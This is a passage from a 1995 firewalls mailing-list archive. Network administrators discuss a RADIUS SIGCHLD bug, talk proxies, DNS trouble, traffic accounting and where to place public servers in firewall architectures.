> do the child death stuff here, with SIGCHLD blocked > > > dead_child = 0; > sigemptyset (&set); > sigaddset (&set, SIGCHLD); > if (sigprocmask (SIG_BLOCK, &set, &oldset) < 0) > { > syslog (....); > } > } > > > After which, using a single server with a large collection of small > flat files representing our customer base of 40000 hosts, I ran 50 > processes, each sending an authentication request for a randomly > chosen user, delaying one second and doing it again. Over the course > of an 8 hour run a single Sparcstation 10 handled 500.000 such > requests at an average of 18 requests/second without a single error - > there were some deliberate non-users thrown in as well. > The original Ascend code died repeatedly in the face of less than 100 > requests at this rate. At lower rates, it seemed to survive, but I was > logging a lot of requests dropped because all 100 process slots were > still in use, and a lot of kills being sent to non-existant > processes. Sooner or later, it almost invariably dumped core, > presumably when a malloc or free was interrupted by a SIGCHLD. Please note this came from Jim Seagrave who has been developing the RADIUS code at Demon Internet Ltd NOT myself. I am just posting this FYI so hopefully others wont be caught by this. Regards Steve Kennedy -- home steve@gbnet.org * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU work steve@demon.net * tel +44-(0)171 483 1169 FAX +44-(0)181 444 6103 www http://www.gbnet.net/ * GSM mobile +44-(0)802 444 500 bits steve@gbnet.net * GSM data @2400 0802-449500 @9600 449501 fax 449502 Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk) From firewalls-owner Tue Sep 5 20:00:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA16070 for firewalls-outgoing; Tue, 5 Sep 1995 19:47:40 -0700 Received: from awadi.com.AU (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA16063 for ; Tue, 5 Sep 1995 19:47:26 -0700 Received: from bunya.awadi ([150.207.1.63]) by awadi.com.AU (4.1/SMI-4.1) id AA07700; Wed, 6 Sep 95 12:13:40 CST Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA17739; Wed, 6 Sep 1995 12:06:36 +0930 From: blymn@awadi.com.AU (Brett Lymn) Message-Id: <9509060236.AA17739@bunya.awadi> Subject: Re: linux vs. *bsd for secure networking system To: Marius@doulosgeri.com Date: Wed, 6 Sep 1995 12:06:36 +0930 (CST) Cc: firewalls@greatcircle.com In-Reply-To: <199509051757.RAA01223@UnixServer.doulosgeri.com> from "Marius" at Sep 5, 95 05:56:28 pm X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Marius: > >weak points, just like everything else does, but I just wanted to say >a few words in its defense... > A very reasonable response! And to redress Karl's omission - you can also go the path of NetBSD which, unlike FreeBSD, has ports to a whole gaggle of different machines - not just PC's. The ports that are running are listed on the WWW page at www.netbsd.org, ones I can remember are Mac, Suns, Amiga, some HP boxen - there are others. -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..." - Terry Pratchett "Moving Pictures". From firewalls-owner Wed Sep 6 00:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA19347 for firewalls-outgoing; Tue, 5 Sep 1995 23:43:49 -0700 Received: from neptunus.rivm.nl (neptunus.rivm.nl [131.224.2.12]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA19340 for ; Tue, 5 Sep 1995 23:43:44 -0700 From: Rens.Schipper@rivm.nl Received: from ccmail.rivm.nl by neptunus.rivm.nl with SMTP (PP); Wed, 6 Sep 1995 08:41:05 +0200 Received: from cc:Mail by ccmail.rivm.nl id AA810402041; Wed, 06 Sep 95 08:39:42 CET Date: Wed, 06 Sep 95 08:39:42 CET Message-Id: <9508068104.AA810402041@ccmail.rivm.nl> To: netmgr02@cbe.ab.ca, firewalls@greatcircle.com Subject: Re: Talk Proxy??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Glen, You could make a fairly easy work-around. Let remote users do a TELNET session to an internal (or in the DMZ) server where they can logon. On this server you start a TALK session to a user-definable internal user@host.(Don't give them a shell!!) This way you have only the telnet protocol over the firewall and the performance of TCP. last but not least you can use all authentication techniques already available for your regular telnet session. Just a thought, Rens Schipper ______________________________ Reply Separator _________________________________ Subject: Re: Talk Proxy??? Author: Brent@GreatCircle.COM (Brent Chapman) at SMTP Date: 5/9/95 21:15 At 11:58 AM 9/5/95, Glen Larwill wrote: >Has anyone created a Talk proxy that works with the TIS FWTK? We have a >large number of users that are complaining becuase our firewalls cannot >handle Talk. From firewalls-owner Wed Sep 6 00:30:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA19604 for firewalls-outgoing; Wed, 6 Sep 1995 00:11:01 -0700 Received: from bass.com.my (bass.com.my [161.142.248.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA19597 for ; Wed, 6 Sep 1995 00:10:50 -0700 Received: from bass.bass.com.my (gw.bass.com.my) by bass.com.my with SMTP id AA17983 (5.67a/IDA-1.5 for ); Wed, 6 Sep 1995 15:09:31 +0800 Received: by bass.bass.com.my (4.1/SMI-4.1) id AA26135; Wed, 6 Sep 95 15:07:16 MYT Date: Wed, 6 Sep 1995 14:46:05 +0800 (MYT) From: Tham Huei Hwan Subject: DNS problem on Netra i To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk HI, Any body have any idea what is going wrong on my Netra i Internet server. My Netra i is setup with the ip address 200.200.9.1 and with the domain name as abc.com.my My Internet Network Provider(INP) is jaring.my and the ip address is 192.228.128.20 When I use the nslookup command, its gives me the following messages: #nslookup *** Can't find server name for address 200.200.9.1: Non-existent domain Default Server: jaring.my Address: 192.228.128.20 >server 200.200.9.1 Default Server: [200.200.9.1] Address: 200.200.9.1 >set type=ns >abc.com.my Server: [200.200.9.1] Address: 200.200.9.1 *** No name server (NS) records available for abc.com.my Anyway, My server can access Internet and send E-mail without any problem and the outside world cannot send the E-mail to this server. Thank. From firewalls-owner Wed Sep 6 05:30:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA24003 for firewalls-outgoing; Wed, 6 Sep 1995 05:24:10 -0700 Received: from gatepas.gc.ca (gatepas.gc.ca [192.197.79.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA23996 for ; Wed, 6 Sep 1995 05:24:07 -0700 Reply-To: Peter.BEAN@ldn01.x400.gc.ca Date: Wed, 06 Sep 1995 01:20:01 +0000 Priority: normal Content-Identifier: OLIVETTI-MAIL3.0 X400-Content-Type: P2-1984 X400-MTS-Identifier: [/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/;939:950906012001] From: Peter.BEAN@ldn01.x400.gc.ca (BEAN Peter -LDN -AG -LES) To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V4 #515 Message-Id: <939*/G=Peter/S=BEAN/O=ldn.01/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/@MHS> Importance: normal In-Reply-To: <199509052333.QAA12533*/DD.RFC-822=miles.greatcircle.com/PRMD=gc+internet/ADMD=GOVMT.CANADA/C=CA/@MHS> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am away from the office until Monday, 18 September 1995 From firewalls-owner Wed Sep 6 07:09:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA24897 for firewalls-outgoing; Wed, 6 Sep 1995 06:41:22 -0700 Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA24890 for ; Wed, 6 Sep 1995 06:41:18 -0700 Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA28601; Wed, 6 Sep 95 08:59:38 CDT Received: by mnbp.network.com with Microsoft Mail id <304DA3E2@mnbp.network.com>; Wed, 06 Sep 95 08:36:34 CDT From: Greg Brennan To: firewalls mailing list Subject: FW: Accounting System Date: Wed, 06 Sep 95 08:36:00 CDT Message-Id: <304DA3E2@mnbp.network.com> Encoding: 25 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Subject: Accounting System >Date: August 22, 1995 10:38PM > >Does anyone know a package that could make accounting the traffic, by >source and destinations (like CISCO routers do) but identifying the >service (FTP, TELNET, HTTP, etc.) > >Fernando Cozinheiro http://sweet.ua.pt/~cooker/ >System & Network Administrator Email: cooker@ci.ua.pt Yes. Packet Control Facility (PCF) runs on Network Systems routers and can be set up to provide you with those details. Check out the web site at http://www.network.com Greg Brennan ________________________________ Greg Brennan | Network Systems Corp. (Canadian Office) Manager, Business Partner Solutions | 5710 Timberlea Blvd., Suite 207 Internet: greg.brennan@network.com | Mississauga, Ontario L4W 4W1 Voice: (905) 629-0440 | "Secure Networks-On-Demand"TM Fax: (905) 629-0435 | http://www.network.com From firewalls-owner Wed Sep 6 08:32:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26197 for firewalls-outgoing; Wed, 6 Sep 1995 08:13:59 -0700 Received: from smurfland.cit.buffalo.edu (smurfland.cit.buffalo.edu [128.205.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26190 for ; Wed, 6 Sep 1995 08:13:56 -0700 Received: (jcmurphy@localhost) by smurfland.cit.buffalo.edu (8.6.11/8.6.4) id LAA28761 for firewalls@GreatCircle.COM; Wed, 6 Sep 1995 11:12:26 -0400 From: Jeff Murphy Message-Id: <199509061512.LAA28761@smurfland.cit.buffalo.edu> Subject: Re: FW: Accounting System To: firewalls@GreatCircle.COM Date: Wed, 6 Sep 1995 11:12:25 -0400 (EDT) In-Reply-To: <304DA3E2@mnbp.network.com> from "Greg Brennan" at Sep 6, 95 08:36:00 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 554 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Does anyone know a package that could make accounting the traffic, by >source and destinations (like CISCO routers do) but identifying the >service (FTP, TELNET, HTTP, etc.) there are several packages available to do this, include Netramet (which is an implementation of the internet accounting architecture). lists of available packages can be found on http://smurfland.cit.buffalo.edu/NetMan/index.html in "The Archives". here at UB, we wrote a small program based on libpcap (ftp.ee.llnl.gov) that does accounting based on port. From firewalls-owner Wed Sep 6 10:02:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA27735 for firewalls-outgoing; Wed, 6 Sep 1995 09:36:10 -0700 Received: from uucp.intac.com (uucp.intac.com [198.6.114.27]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA27728 for ; Wed, 6 Sep 1995 09:36:06 -0700 Received: from cdssrv.UUCP (uucp@localhost) by uucp.intac.com (8.6.5/8.6.5) with UUCP id MAA07575 for greatcircle.com!firewalls; Wed, 6 Sep 1995 12:07:07 -0400 Received: from cdshpa.chesapeake.com by cdssrv.chesapeake.com id aa08840; 6 Sep 95 11:51 EDT Received: by cdshpa.chesapeake.com (1.37.109.4/16.2) id AA02949; Wed, 6 Sep 95 11:48:06 -0400 From: Matt Hagadorn Subject: Where to put Internet Services? To: firewalls@greatcircle.com Date: Wed, 6 Sep 95 11:48:05 EDT Reply-To: msh@chesapeake.com Mailer: Elm [revision: 70.85] Message-ID: <9509061151.aa08840@cdssrv.chesapeake.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've been reading this list for a while and reading (and trying to understand) as much of the firewall books/materials I can get my hands on, but there's something I'm having difficulty grasping. My company is looking at getting a "real" connection to the Internet (surprise!) and since I'm the network guy I get to learn more than I ever wanted to know about firewalls. The part I don't understand is where you would place application services (WWW server and anon FTP server for outside customers to access) in the case of a dual-homed gateway or a screened-host firewall. In the case of a dual-homed firewall, I would assume the FTP and WWW server software would be directly on the firewall machine? Is this a security risk? Or do you just provide and incoming proxy on the firewall that points to an inside machine running the httpd or ftpd servers? In the case of the screened host implementation, do the services go on the bastion host, or does it simply offer an incoming proxy service to the real machine running the WWW or FTP software? I don't see configuring the router to allow incoming FTP or http traffic to a host other than the bastion, otherwise your no longer running a screened host type of firewall. Am I right? Any insights would be appreciated. Matt -- Matt Hagadorn Chesapeake Decision Sciences, Inc. email: msh@chesapeake.com From firewalls-owner Wed Sep 6 10:30:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA29374 for firewalls-outgoing; Wed, 6 Sep 1995 10:28:41 -0700 Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA29367; Wed, 6 Sep 1995 10:28:37 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 6 Sep 1995 10:27:49 -0800 To: msh@chesapeake.com, firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Where to put Internet Services? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:48 AM 9/6/95, Matt Hagadorn wrote: >My company is looking at getting a "real" connection to the Internet >(surprise!) and since I'm the network guy I get to learn more than I ever >wanted to know about firewalls. The part I don't understand is where you >would place application services (WWW server and anon FTP server for outside >customers to access) in the case of a dual-homed gateway or a screened-host >firewall. > >In the case of a dual-homed firewall, I would assume the FTP and WWW server >software would be directly on the firewall machine? Is this a security risk? Yes, that's pretty much what folks usually do, and yes, it's a risk. In a nutshell, when (not if) someone breaks into your dual-homed host (via those services or others), you're hosed; the attackers will then have free access to your internal network. It generally doesn't take much (often just a little bit of packet sniffing) to leverage that into access to the internal systems. >Or do you just provide and incoming proxy on the firewall that points to >an inside machine running the httpd or ftpd servers? You could do that, but you're merely moving the problem, not eliminating it. >In the case of the screened host implementation, do the services go on the >bastion host, or does it simply offer an incoming proxy service to the real >machine running the WWW or FTP software? I don't see configuring the router >to allow incoming FTP or http traffic to a host other than the bastion, >otherwise your no longer running a screened host type of firewall. Am I right? Again, you could do it either way, but the problem remains: when someone compromises the bastion host, your internal network is completely exposed to it. This is why I strongly prefer screened subnet architectures to screened host or dual-homed host architectures. There's a measure of redundancy in a screened subnet architecture; even if an attacker utterly compromises the bastion host, they still have to get past the interior filtering system to attack the internal systems, and there's no strictly-internal traffic for them to snoop on while they're trying to figure out how to proceed. We discuss these and other related issues in some detail, complete with diagrams, in Chapter 4 of "Building Internet Firewalls"; see http://www.greatcircle.com/firewalls-book or send email to firewalls-book-info@greatcircle.com for more information about the book. -Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Wed Sep 6 13:02:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA02039 for firewalls-outgoing; Wed, 6 Sep 1995 12:48:24 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA02032 for ; Wed, 6 Sep 1995 12:48:19 -0700 Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzgbf11309; Wed, 6 Sep 1995 15:46:58 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA01981; Wed, 6 Sep 95 15:39:23 EDT Date: Wed, 6 Sep 1995 15:39:22 -0400 (EDT) From: Sick Puppy Subject: Windows NT servers in different networks and firewall To: firewalls@GreatCircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just when we are all getting a warm snug feeling with TCP/IP, Windows NT jumps out to hit us over the head with its TCP/IP - IPX - NetBios multiple stack. Given the ease with which it is possible to do IP spoofing with commercially available software and a publicly available sniffer, I wonder what can be done to effectively firewall two Windows NT servers that each live in a different network but share a common user population between the two networks. The firewall would have to handle authentication, file and print services and rpc calls. Which vendors, if any, supply a firewall with these capabilities for Windows NT servers? Sick Puppy, the Cat_Eating_Dawg Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter -=:( Chained, whipped, beaten and severely abused in Katherine's Dungeon ):=- -=:( How could anything that feels so good be so wrong ):=- From firewalls-owner Wed Sep 6 13:33:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA02598 for firewalls-outgoing; Wed, 6 Sep 1995 13:14:55 -0700 Received: from sun.aitc.rest.tasc.com (sun.aitc.rest.tasc.com [147.81.50.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA02578 for ; Wed, 6 Sep 1995 13:14:49 -0700 Received: from iwdc1.office.rest.tasc.com by sun.aitc.rest.tasc.com (NX5.67d/NX3.0M-TASCnet-003) id AA09920; Wed, 6 Sep 95 16:06:27 -0500 Received: by AA03508wdc1.office.rest.tasc.com (4.1/SMI-4.1) id AA03508; Wed, 6 Sep 95 16:13:09 EDT Date: Wed, 6 Sep 95 16:13:09 EDT From: rebowes@iwdc1.office.rest.tasc.com (Bob Bowes) Message-Id: <9509062013.AA03508@AA03508wdc1.office.rest.tasc.com> To: firewalls@greatcircle.com, msh@chesapeake.com Subject: Re: Where to put Internet Services? Reply-To: rebowes@tasc.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk With a dual-homed firewall, your web page and ftp site can go in the demilitarized zone (between the two homes). With any other firewall (screening or proxy recommended), put these services on a machine outside the firewall. You can still place it behind the router. Don't put anything you don't want made public on this machine. Good luck on setting up your service! Bob Bowes From firewalls-owner Wed Sep 6 13:37:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA02503 for firewalls-outgoing; Wed, 6 Sep 1995 13:11:53 -0700 Received: from hawksbill.sprintmrn.com (hawksbill.sprintmrn.com [199.11.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA02496 for ; Wed, 6 Sep 1995 13:11:47 -0700 Received: by hawksbill.sprintmrn.com (5.65/1.34) id AA18891; Wed, 6 Sep 95 16:10:20 -0500 From: paul@hawksbill.sprintmrn.com (Paul Ferguson) Message-Id: <9509062110.AA18891@hawksbill.sprintmrn.com> Subject: Re: Where to put Internet Services? To: msh@chesapeake.com Date: Wed, 6 Sep 1995 16:10:20 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <9509061151.aa08840@cdssrv.chesapeake.com> from "Matt Hagadorn" at Sep 6, 95 11:48:05 am X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 1270 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > My company is looking at getting a "real" connection to the Internet > (surprise!) and since I'm the network guy I get to learn more than I ever > wanted to know about firewalls. The part I don't understand is where you > would place application services (WWW server and anon FTP server for outside > customers to access) in the case of a dual-homed gateway or a screened-host > firewall. > > In the case of a dual-homed firewall, I would assume the FTP and WWW server > software would be directly on the firewall machine? Is this a security risk? Big time. > Or do you just provide and incoming proxy on the firewall that points to > an inside machine running the httpd or ftpd servers? You can do that, or you could simply place them on the external perimeter network. It all depends on what value you place on these servers. If you want to minimize risk, then proxy services is the way to go. - paul _______________________________________________________________________________ Paul Ferguson Dulcius Ex Asperis US Sprint tel: 703.689.6828 Managed Network Engineering internet: paul@hawk.sprintmrn.com Reston, Virginia USA http://www.sprintmrn.com From firewalls-owner Wed Sep 6 14:00:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA03041 for firewalls-outgoing; Wed, 6 Sep 1995 13:33:24 -0700 Received: from tigger.jvnc.net (tigger.jvnc.net [128.121.50.145]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA03034 for ; Wed, 6 Sep 1995 13:33:14 -0700 Received: from [192.67.239.213] (franklin-tty13.jvnc.net) by tigger.jvnc.net with SMTP id AA25127 (5.65c/IDA-1.4.4 for ip-atm@matmos.hpl.hp.com); Wed, 23 Aug 1995 14:16:59 -0400 Date: Wed, 23 Aug 1995 14:16:59 -0400 X-Sender: corecom@tigger.jvnc.net Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@greatcircle.com, ip-atm@matmos.hpl.hp.com From: dave@corecom.com (David M. Piscitello) Subject: Call for papers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, The following call for papers seems relevant to these lists, but as I did not see it posted here, I'm cross posting... regards, dave ------------ C A L L F O R P A P E R S 3rd annual NetWorld+Interop Engineers' Conference Las Vegas, Nevada April 3rd and 4th, 1996 GENERAL INFORMATION The NetWorld+Interop US Program Committee is pleased to solicit original technical papers for the 3rd annual Interop Engineers' Conference, held in conjunction with the NetWorld+Interop Conference and Exhibition, from April 1st through 5th, 1996. In order to focus discussion and interaction, this year the Engineers' Conference is focusing on six topic areas of interest in computer-communications: - Resource Management over Heterogeneous Networks - Cell-based Routing - Traffic management and the Future of Congestion Control - Distributed Applications Management - Video over Enterprise Networks - High-speed Packet Filtering and Firewalling A detailed description of each topic area appears below. This conference seeks to bring together research scholars, engineers, and vendors to address pragmatic engineering issues in the field of networking and distributed systems interoperability. It is an excellent forum for engineers and researchers to publish papers on solutions to today's engineering-related problems. PROCEDURES AND DEADLINES 1. Interested parties should submit abstracts of their papers by September 8, 1995 An abstract should be 500-1000 words in length and convey the key aspects of the paper. All abstracts should be submitted in ASCII. The program committee will indicate its acceptance (or not), no later than September 22, 1995. To submit an abstract, send a message To: engrconf@interop.com Subject: abstract (Do not have anything else in the Subject: line.) The message should contain your complete contact information (name, affiliation, postal address, telephone, facsimile, and e-mail) along with your abstract. An automated reply will confirm receipt of your abstract. 2. If an abstract is accepted, the author(s) should submit a first draft of their paper by December 31, 1995 A paper should be between 10 to 16 pages in length, and be written in technical english. All papers should be submitted either in ASCII or PostScript. The program committee will indicate its acceptance (with comments) or not, on January 19, 1996. 3. If a paper is accepted, the author(s) should submit the final copy of their paper, reflecting the comments of the program committee by February 23, 1996 All final copies will be published in the event proceedings. Upon receipt of the final copy, the program committee will inform the author(s) if their papers are to be presented at the event. A presentation should be 20-25 minutes, excluding questions. Note that although every author who submits a final copy of an accepted paper receives a complimentary admission to the Engineers' Conference as well as the N+I General Conference and Exhibition, there may not be sufficient speaking slots for each accepted paper. DESCRIPTION OF TOPICS 1. Resource Management over Heterogeneous Networks Papers in this topic area are expected to address issues related to providing bandwidth guarantees or bandwidth on demand solutions in heterogeneous networks, i.e., networks whose paths include a variety of high-speed transmission media and services (ATM, FDDI, cell- and frame-based public services, high-speed and legacy LANs). Subjects include, but are not limited to, traffic engineering and service provisioning, routing and resource reservation models, traffic profiles (observed and simulated), traffic shaping and management, and queueing models (effectiveness of models, observed and simulated). 2. Next Generation Cell-based Routing While the industry debates ATM vs. routing, researchers are beginning to develop next generation routers which combine the best of both technologies. So-called cell-based routers offer low latency and high performance of cell technology with the software robustness of existing routers. In addition, cell-based routers may provide support for services such as virtual routing, IP multicast, traffic management, along with support for non-internet services such as voice and real time video. Subjects include, but are not limited to, design issues for cell-based routers, implementation, and deployment experiences. 3. Traffic management and the Future of Congestion Control Papers in this topic area are expected to address the future of traffic management and congestion control with respect to the different problems associated with handling voice, video, and data. Papers should focus on emerging structures and technologies that address these issues. Subjects include, but are not limited to, network complexity, size, diversity, and gigabit speeds. 4. Distributed Applications Management Papers in this topic area are expected to address issues related to managing distributed applications running over a mixture of desktop and network operating systems on both local and wide area networks. Subjects include, but are not limited to, tracking desktop computer hardware and software inventory, providing pro-active alert notification of network and applications processes, interfaces to help-desk management software and network management consoles, gathering usage statistics of file, print, and applications services, managing redundant WAN links to distributed servers, and managing multiple network operating systems services. 5. Video over Enterprise Networks Network-based video products are available today, but no one would mistake current service for movie-theatre quality or face-to-face interaction. Improvements are needed in network capabilities and their use by video-based applications. Papers for this topic area will discuss research efforts to improve the basic technology of network-based video services and techniques for making them more accessible. Subjects include, but are not limited to, schemes for picture encoding, improvements in bandwidth use, methods for accommodating variable latency, integration for multi-media service, standards efforts for 21st century service, and access to video applications. 6. High-speed Packet Filtering and Firewalling Papers in this topic area are expected to address issues related to providing effective packet-filters and firewalls while sustaining very high transmission rates between a public internetwork and a private network. Authors are encouraged to demonstrate the effectiveness or limitations of current firewall techniques through observation and simulation, or to propose advanced packet-filtering techniques that may be implemented in routers or intermediate systems to obviate the need for application-level proxies and host processing. ####### David M. Piscitello Core Competence, Inc. 1620 Tuckerstown Road Dresher, PA USA 19025 dave@corecom.com 1.215.830.0692 From firewalls-owner Wed Sep 6 17:02:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA07173 for firewalls-outgoing; Wed, 6 Sep 1995 16:56:15 -0700 Received: from ucsdext.ucsd.edu (ucsdext.ucsd.edu [132.239.108.211]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA07166 for ; Wed, 6 Sep 1995 16:56:10 -0700 Received: from juju.adnc.com (robo13.adnc.com) by ucsdext.ucsd.edu (5.x/SMI-SVR4) id AA29136; Wed, 6 Sep 1995 16:50:09 -0700 Message-Id: <9509062350.AA29136@ucsdext.ucsd.edu> X-Sender: dschiffrin@popmail.ucsd.edu X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 06 Sep 1995 17:01:58 -0700 To: lpierce@intex.net (S. Lane Pierce) From: David Schiffrin Subject: Re: firewall with only one IP address ??? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:14 AM 9/5/95 -0500, S. Lane Pierce wrote: >Matt- > >Are you sure you only get 1 host address or 1 network address? Usually 1 >class c network address is assigned, this will yield 254 host addresses. ------------snipped-------------->8 >Check with your provider. > >Good luck. > [more stuff snipped] many providers I've worked with have low cost connections which are restricted to one IP address (PPP style) often, Internic will issue a class c if requested, but the provider may charge $$ to advertise DNS into the assigned net-number. cheers -Dave -------------------------------------------------------------------------------- David Schiffrin dschiffrin@ucsd.edu From firewalls-owner Wed Sep 6 17:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA07251 for firewalls-outgoing; Wed, 6 Sep 1995 17:01:59 -0700 Received: from ucsdext.ucsd.edu (ucsdext.ucsd.edu [132.239.108.211]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA07244 for ; Wed, 6 Sep 1995 17:01:54 -0700 Received: from robo13.adnc.com by ucsdext.ucsd.edu (5.x/SMI-SVR4) id AB29136; Wed, 6 Sep 1995 16:50:21 -0700 Message-Id: <9509062350.AB29136@ucsdext.ucsd.edu> X-Sender: dschiffrin@popmail.ucsd.edu X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 06 Sep 1995 17:02:09 -0700 To: Tham Huei Hwan From: David Schiffrin Subject: Re: DNS problem on Netra i Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 02:46 PM 9/6/95 +0800, Tham Huei Hwan wrote: >HI, > >Any body have any idea what is going wrong on my Netra i Internet server. >My Netra i is setup with the ip address 200.200.9.1 and with the domain >name as abc.com.my >My Internet Network Provider(INP) is jaring.my and the ip address is >192.228.128.20 > >When I use the nslookup command, its gives me the following >messages: > >#nslookup >*** Can't find server name for address 200.200.9.1: Non-existent domain >Default Server: jaring.my >Address: 192.228.128.20 > > >>server 200.200.9.1 >Default Server: [200.200.9.1] >Address: 200.200.9.1 > > >>set type=ns >>abc.com.my >Server: [200.200.9.1] >Address: 200.200.9.1 > >*** No name server (NS) records available for abc.com.my > >Anyway, My server can access Internet and send E-mail without any problem >and the outside world cannot send the E-mail to this server. > I'd say your problem is that your provider's DNS server isn't advertising your ip addresses. jaring.my doesn't resolve 200.200.9.1 for me either. give them a call, I'm sure they can help in just a few moments. -------------------------------------------------------------------------------- David Schiffrin dschiffrin@ucsd.edu From firewalls-owner Thu Sep 7 05:32:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA15127 for firewalls-outgoing; Thu, 7 Sep 1995 05:29:28 -0700 Received: from linda.fdata.se (linda.fdata.se [159.72.248.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA15120 for ; Thu, 7 Sep 1995 05:29:24 -0700 Received: from WMX.WMDATA.SE (wmx.wmdata.se [164.9.179.100]) by linda.fdata.se (8.6.12/8.6.9) with SMTP id OAA04371 for ; Thu, 7 Sep 1995 14:24:46 +0200 X400-Received: by /PRMD=WMDATAWMX/ADMD=WMDATA/C=SE/; Relayed; Thu, 7 Sep 1995 14:27:34 +0100 Date: Thu, 7 Sep 1995 14:27:34 +0100 X400-Originator: Roberto.Piludu@STO4.wmdata.se X400-Recipients: firewalls@greatcircle.com X400-MTS-Identifier: [/PRMD=WMDATA/ADMD=WMDATA/C=SE/;0012400001517066000002] X400-Content-Type: P2-1988 (22) Content-Identifier: CSI NC V3.0 From: "Piludu, Roberto" Message-ID: <0004622A.MAI*/S=WMROPIL/OU=STO4/OU=WMDATA/O=MSMAIL/PRMD=WMDATA/ADMD=WMDATA/C=SE/@MHS> To: "'Firewalls'" Subject: SNA through firewalls? Sender: 